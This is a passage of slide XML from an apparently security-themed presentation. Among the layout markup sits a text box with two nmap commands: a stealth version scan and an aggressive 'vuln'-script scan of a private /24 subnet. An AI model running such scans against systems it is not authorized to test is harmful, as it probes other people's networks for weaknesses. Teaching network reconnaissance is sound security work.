              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6248775" y="14813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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172575" y="1481375"/>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nmap -sS -sV 192.168.1.0/24</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nmap -A --script=vuln -vvv 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248775" y="2615321"/>
            <a:ext cx="2428500" cy="2022113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248772" y="2434884"/>
            <a:ext cx="2905126" cy="2737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